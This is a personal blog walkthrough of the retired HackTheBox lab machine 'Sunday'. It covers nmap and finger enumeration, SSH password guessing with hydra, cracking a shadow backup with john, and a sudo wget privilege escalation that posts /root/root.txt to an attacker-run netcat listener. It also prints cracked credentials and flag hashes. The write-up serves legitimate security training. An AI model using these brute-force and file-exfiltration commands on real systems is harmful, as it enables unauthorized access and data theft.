October 02, 2018

HackTheBox - Sunday

It’s been quite a long time since I posted anything here. Yesterday, I realised now’s the time… to brag about something. Lately, I’ve been testing my hacking skills on HackTheBox. So I thought, why not post a writeup for it. And here I am, welcoming you to my first writeup for a retired machine Sunday. Before starting, I wanna tell you that though this machine is a easy one, you’ll learn a few new things. I’ll try to go through all the steps I did to root this machine & hope that you’ll enjoy reading it.


Target Information

IP Address : 10.10.10.76
OS Family : Solaris
Hostname : Sunday

Host Information

IP Address : 10.10.12.236
OS Family : Linux
Hostname : LocalHost

Now, our first step will be enumerating the services running on the machine.

Enumeration

I use Nmap for enumeration purposes. So, I loaded my terminal & started with

mkdir nmap
nmap -sV -sC -oA nmap/primary 10.10.10.76

Here,

  • -sV returns info related to the services & their version
  • -sC runs default nmap scripts
  • -oA saves output in all formats (XML, nmap, gnmap) in nmap/primary

Now, this scan result shows that there is a finger service running on the machine which is then used to show information about users on the machine. Here, we got two usernames sammy & sunny. Just in case, if there is no user shown logged in then, there is metasploit module auxiliary/scanner/finger/finger_users that can be used for that purpose. In that case, just ignore other users.

Still we don’t see any port through which we can access the machine. So, I decided to run another Nmap scan but instead of using default scripts, we’ll do a TCP SYN scan this time.

nmap -v -sV -sS -p0-65535 -T4 -Pn -oA nmap/secondary 10.10.10.76

Here,

  • -v scans in verbose mode
  • -sS does a TCP SYN scan
  • -p0-65535 scans all TCP ports
  • -T4 makes the scan faster using four threads
  • -oA saves output in all formats (XML, nmap, gnmap) in nmap/secondary

Voila!! That’s what I was talking about. We got SSH listening on port 22022.

Gaining Access

Now, we have to use this SSH port to gain access to the system & this can be painful if you’re a noob as we got two usernames & no password. Most of the folks out there will try to run an automated brute force against the SSH. And believe me, it’s a good move but sometimes can be time consuming. And I ain’t got that. After few mind guesses, I eventually found a combination that worked.

username :sunny
password :sunday

Still if you’re weak at doing guesses, you can always use hydra.

hydra -s 22022 -L username.txt -P rockyou.txt 10.10.10.76 -t 4 ssh

As you can see that, I’m trying to run hydra on port 22022 with the SSH protocol, using 4 threads, using the username.txt file which contains the usernames that we found in the beginning & the legendary rockyou.txt as password dictionary.

Now using these credentials, I’m going to login via SSH. But when I was trying to login with traditional method, the server was giving me an error that there is no matching key exchange method found. Still, I turned out to be smarter than the creator & logged in.

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p 22022

Now, I’m logged in the machine as sunny. But I’m unable to access the user flag in user.txt file. So, we need to pivot somehow to sammy. After some more enumeration, I found a shadow.backup file which contains hashed passwords of some users & is incomplete backup of /etc/shadow as it doesn’t have the hash for the root. I also noticed that I was able to view the contents of /etc/passwd. Now I needed to somehow crack the hashes for sammy. So I copied the contents of both the file & joined it in pwd.txt.

Then, I tried to crack it using john

john pwd.txt --wordlist=rockyou.txt

Now, we got the following credentials.

username :sammy
password :cooldude!

Now we can log in SSH using the above credentials.

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sammy@10.10.10.76 -p 22022

Now we can successfully get the user flag from user.txt file.

Now we have to get the root flag.

Privilege Escalation

Now, being sammy I wanted to know that what services can i run as root.

sudo -l

Turns out, I can run wget as root.

Now, I started a Netcat server on my host on port 1234.

sudo nc -lvnp 1234

Then I ran wget as sammy to access the root flag in root.txt file.

sudo wget --post-file=/root/root.txt 10.10.12.236:1234

And Voila !! We got the root flag too.

Flags

User : a3d9498027ca5187ba1793943ee8a598
Root : fb40fab61d99d37536daeec0d97af9b8

My people are destroyed for lack of knowledge. –Hosea 4:6


And that’s it. Hope you didn’t got bored reading it. I’ll try to keep releasing writeups on machines as soon as they get retired. Good Bye !!